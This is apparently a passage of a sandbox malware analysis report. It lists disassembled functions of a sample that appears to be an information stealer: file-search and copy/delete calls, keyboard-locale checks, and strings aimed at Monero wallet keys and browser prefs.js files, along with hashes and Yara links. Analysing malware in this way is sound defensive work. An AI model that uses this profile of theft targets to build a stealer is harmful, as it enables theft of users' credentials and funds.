                                • Opcode ID: a2dc0c77194b3e865a951bdd1923189c539e1955ab2a11b27541413ca7bfa215
                                • Instruction ID: c90318334bd68be7631cac20649ba34647e7d6320c80811fdffaf9d20bd66810
                                • Opcode Fuzzy Hash: a2dc0c77194b3e865a951bdd1923189c539e1955ab2a11b27541413ca7bfa215
                                • Instruction Fuzzy Hash: DEE1C172951218AAFB54FB61DC52EEE7338FF54300F4145A9B50A62092EF306F8ADF52
                                Function 00C3F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C515B8,00C50D96), ref: 00C3F71E
                                • StrCmpCA.SHLWAPI(?,00C515BC), ref: 00C3F76F
                                • StrCmpCA.SHLWAPI(?,00C515C0), ref: 00C3F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3FAB1
                                • FindClose.KERNEL32(000000FF), ref: 00C3FAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: e82a525782b1dbe0e4e9ac28b5688fc184496b1ae9ffe3d53a9193b91fd5ebd6
                                • Instruction ID: ce60286ecaf54352c400ec3d6ef6586eed2758cfe666bafb22a56272c0b7325f
                                • Opcode Fuzzy Hash: e82a525782b1dbe0e4e9ac28b5688fc184496b1ae9ffe3d53a9193b91fd5ebd6
                                • Instruction Fuzzy Hash: EAB135719501189FEB24FF61DC56BEE7379BF94300F4085A8E80A96191EF305B4ADF92
                                Function 00C316D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C5510C,?,?,?,00C551B4,?,?,00000000,?,00000000), ref: 00C31923
                                • StrCmpCA.SHLWAPI(?,00C5525C), ref: 00C31973
                                • StrCmpCA.SHLWAPI(?,00C55304), ref: 00C31989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C31D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00C31DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C31E20
                                • FindClose.KERNEL32(000000FF), ref: 00C31E32
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 0aecccb04745fe0a132b0b93b095192a34a05f7090a50b2fcd39f22282db6e45
                                • Instruction ID: fdec33b041c14b9581fbc0c9109d3d91e4ab8e44855bb5a9eedb08c0f5d1414b
                                • Opcode Fuzzy Hash: 0aecccb04745fe0a132b0b93b095192a34a05f7090a50b2fcd39f22282db6e45
                                • Instruction Fuzzy Hash: 9A120F71950118ABEB19FB60DC96EEE7378FF54300F4145A9B50A62091EF306F89DFA2
                                Function 00C3DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C50C2E), ref: 00C3DE5E
                                • StrCmpCA.SHLWAPI(?,00C514C8), ref: 00C3DEAE
                                • StrCmpCA.SHLWAPI(?,00C514CC), ref: 00C3DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3E3E0
                                • FindClose.KERNEL32(000000FF), ref: 00C3E3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 4c09be76860beb4be9f20ab8666e7eb43e49e01939a1d5cca75cf107dd9a0f18
                                • Instruction ID: 111795a56ab692dda2279b2e851379373de36c8f767597a4cd725cb923326205
                                • Opcode Fuzzy Hash: 4c09be76860beb4be9f20ab8666e7eb43e49e01939a1d5cca75cf107dd9a0f18
                                • Instruction Fuzzy Hash: 79F1B1718641189AEB25FB61DC95EEE7338FF54304F8141E9B41A62091EF306F8ADF62
                                Function 010008C8 Relevance: 14.1, Strings: 10, Instructions: 1635COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ^gW$,=s{$,^7$A]w-$V5<$hs$jS_w$u1>?$!{$~~
                                • API String ID: 0-2523261931
                                • Opcode ID: 326cf0e2f6e3de6baffb6b9c9aff487e56f1e4f3444c59d68007c2fa949e11c5
                                • Instruction ID: 529d294f0c1bb2f32c4858a1879f96eae6f09a57e5790fd1e4d3296d2a6a566e
                                • Opcode Fuzzy Hash: 326cf0e2f6e3de6baffb6b9c9aff487e56f1e4f3444c59d68007c2fa949e11c5
                                • Instruction Fuzzy Hash: 8DB2E7F360C2049FE304AE2DEC8567AFBE9EFD4620F1A493DE6C4C7744E63598058696
                                Function 00C3DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C514B0,00C50C2A), ref: 00C3DAEB
                                • StrCmpCA.SHLWAPI(?,00C514B4), ref: 00C3DB33
                                • StrCmpCA.SHLWAPI(?,00C514B8), ref: 00C3DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3DDCC
                                • FindClose.KERNEL32(000000FF), ref: 00C3DDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: e3038d64ad225fc0ea0da398b119e0bd378e8190b4498a9b296e9cfbfd3b19e4
                                • Instruction ID: fc0bc6d1fd09dfed5cc20187a2ba5ae2c52d1dd8e3e6b1238503808740756472
                                • Opcode Fuzzy Hash: e3038d64ad225fc0ea0da398b119e0bd378e8190b4498a9b296e9cfbfd3b19e4
                                • Instruction Fuzzy Hash: C4915172910104ABDB14FBB1EC96AED737DBB84304F408668FC1A96181EE349B5DDB93
                                Function 00FFED71 Relevance: 11.6, Strings: 8, Instructions: 1645COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: JK0($U2}m$di?$i/_$jqw3$rZvf$&Qy$20(
                                • API String ID: 0-2360829891
                                • Opcode ID: 4eab0e674bea5d75963062f865f0558dd11b7217444253e36b73f21f6e6df852
                                • Instruction ID: f5d922af0ea93873e506f1e163b504c97ad3cd19095536a3c3bba46b3a431d06
                                • Opcode Fuzzy Hash: 4eab0e674bea5d75963062f865f0558dd11b7217444253e36b73f21f6e6df852
                                • Instruction Fuzzy Hash: 3FB2F8F3A0C2149FE3046E2DEC8567AF7E9EF94720F16853DEAC493744EA3558048697
                                Function 00C47B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00C505AF), ref: 00C47BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C47BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C47C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C47C62
                                • LocalFree.KERNEL32(00000000), ref: 00C47D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: a9b35d9a094cafaebf4e8f2da11b78130fca7a90a13bc09dd1d68155f5ac659d
                                • Instruction ID: a84943b41c37cd29da9ad5e61304c637b8bfae034f35d0997914ab652976b337
                                • Opcode Fuzzy Hash: a9b35d9a094cafaebf4e8f2da11b78130fca7a90a13bc09dd1d68155f5ac659d
                                • Instruction Fuzzy Hash: 42415C71950218ABDB24DF95DC99BEEB778FF44700F204299E50AA2181DB342F89CFA1
                                Function 00C3E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C50D73), ref: 00C3E4A2
                                • StrCmpCA.SHLWAPI(?,00C514F8), ref: 00C3E4F2
                                • StrCmpCA.SHLWAPI(?,00C514FC), ref: 00C3E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: d84e3eb952e26aae74e8874422d22aee6c1209320a88762b95a8648d4149bb90
                                • Instruction ID: c11abe0bff9ed55c2db3fd304ec223208bc92731c7e4f501e312f6b61ff20690
                                • Opcode Fuzzy Hash: d84e3eb952e26aae74e8874422d22aee6c1209320a88762b95a8648d4149bb90
                                • Instruction Fuzzy Hash: 06122172950118ABEB14FB60DC96EED7378BF54300F4145A9B90AA60D1EF306F89DF92
                                Function 01007478 Relevance: 9.2, Strings: 6, Instructions: 1669COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A?$a_}l$gg$s2_'$u}0$1];
                                • API String ID: 0-4111299748
                                • Opcode ID: 769e82b9ea3e224ac906125750b60d4cdf8dc2312d09540611fa4a1d84f9a613
                                • Instruction ID: 8e0bab0d1343c43ba57349fb29e608cf91ad03a45b7a111728a7c187bb76e188
                                • Opcode Fuzzy Hash: 769e82b9ea3e224ac906125750b60d4cdf8dc2312d09540611fa4a1d84f9a613
                                • Instruction Fuzzy Hash: 61B228F3A0C6005FE3046E2DEC8567AFBE9EBD4320F1A863DEAC4C7744E97558058696
                                Function 00FF9F14 Relevance: 9.1, Strings: 6, Instructions: 1628COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
